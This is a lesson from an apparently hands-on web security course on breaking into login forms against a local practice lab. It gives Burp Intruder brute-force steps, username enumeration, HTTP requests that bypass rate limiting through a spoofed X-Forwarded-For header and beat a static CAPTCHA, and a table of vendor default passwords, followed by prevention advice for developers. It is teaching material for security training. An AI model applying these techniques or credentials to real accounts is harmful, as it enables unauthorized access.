Breaking Into Accounts
Authentication is the process of proving who you are. Usually that means a username and password. When authentication fails, attackers get in.
In this lesson, you'll learn:
- How password attacks work
- Brute forcing with Burp Suite
- Bypassing rate limiting
- Default credentials and credential stuffing
- Multi-factor authentication bypasses
Let's break some logins.
Types of Authentication Attacks
1. Brute Force
Try every possible password combination until one works.
aaa, aab, aac... eventually password123
2. Dictionary Attack
Try passwords from a wordlist of common passwords.
password, 123456, admin, letmein...
3. Credential Stuffing
Use credentials leaked from other breaches.
If someone used john@email.com:password123 on LinkedIn, try it everywhere.
4. Password Spraying
Try a few common passwords against many accounts.
Try Password1 against all users, then Summer2024, etc.
Avoids account lockouts.
5. Default Credentials
Many systems ship with default passwords that administrators forget to change.
Building the Authentication Lab
Download and run the authentication attack practice lab:
Authentication Attack Lab
Practice brute force, rate limit bypass, and username enumeration attacks
python3 auth_lab.py
The lab includes 5 vulnerable login forms:
- Basic Login - No protection (brute force target)
- Lockout Login - Account locks after 5 attempts
- Rate Limited - IP-based rate limiting (bypassable via X-Forwarded-For)
- CAPTCHA Login - Static CAPTCHA (always "10")
- Username Check - Reveals valid usernames
Test users: admin, john, jane, bob, alice
Attack 1: Brute Force with Burp Intruder
Step 1: Capture the Login Request
- Configure browser to proxy through Burp
- Attempt a login on the basic login form
- Find the request in Proxy → HTTP history
- Right-click → Send to Intruder
Step 2: Configure the Attack
- Go to the Intruder tab
- In Positions, clear all positions (Clear §)
- Select just the password value and click "Add §"
username=admin&password=§test§Step 3: Add a Password List
- Go to the Payloads tab
- Add common passwords:
password
123456
admin
admin123
password1
qwerty
letmein
welcomeOr load a wordlist file (SecLists has great ones).
Step 4: Start the Attack
- Click "Start attack"
- Watch the results
- Look for different response lengths or status codes
- The correct password will have a different response
Attack 2: Username Enumeration
The Vulnerability
Many login forms reveal whether a username exists:
- "Invalid password" = user exists
- "User does not exist" = user doesn't exist
Exploiting It
- Send the "check username" request to Intruder
- Use a list of common usernames
- Compare responses
- "Username is taken" means valid user
Attack 3: Bypassing Rate Limiting
The lab's third login checks your IP address. After 5 requests, you're blocked.
The Vulnerability
The code checks the X-Forwarded-For header:
xff = self.headers.get('X-Forwarded-For')
if xff:
return xff.split(',')[0].strip()The Exploit
Add a spoofed IP header to each request:
POST /login3 HTTP/1.1
Host: localhost:8888
X-Forwarded-For: 10.0.0.1
username=admin&password=test1Change the IP for each request:
X-Forwarded-For: 10.0.0.1X-Forwarded-For: 10.0.0.2X-Forwarded-For: 10.0.0.3
Attack 4: Bypassing Weak CAPTCHA
The lab's fourth login has a CAPTCHA: "What is 7 + 3?"
The Vulnerability
The answer is always the same! It's a static CAPTCHA.
The Exploit
Just include captcha=10 in every request:
POST /login4 HTTP/1.1
Host: localhost:8888
username=admin&password=test&captcha=10Now brute force normally.
Default Credentials
Many systems ship with default passwords:
| Product | Username | Password |
|---|---|---|
| Tomcat | admin | admin |
| Tomcat | tomcat | tomcat |
| MySQL | root | (empty) |
| PostgreSQL | postgres | postgres |
| Jenkins | admin | admin |
| Router (various) | admin | admin |
| Router (various) | admin | password |
Prevention (For Developers)
Account Lockout
- Lock after 5-10 failed attempts
- Reset after successful login
- Notify user of lockout
Rate Limiting
- Limit by user, not just IP
- Use backend validation, not headers
- Implement exponential backoff
Strong CAPTCHA
- Use Google reCAPTCHA or similar
- Never use static challenges
- Re-challenge after failures
Multi-Factor Authentication
- Best defense against password attacks
- Use TOTP apps, not SMS
- Make it mandatory for admin accounts
Lab Challenges
- Brute force admin's password using Burp Intruder
- Enumerate all valid usernames in the system
- Bypass rate limiting using header manipulation
- Attack the lockout-protected login using password spraying
- Bypass the CAPTCHA and brute force passwords
What's Next?
You've broken into accounts. But what happens after login? Sessions.
In Lesson 7: Session Hijacking, we'll learn how to steal active sessions, bypass authentication entirely, and maintain persistent access.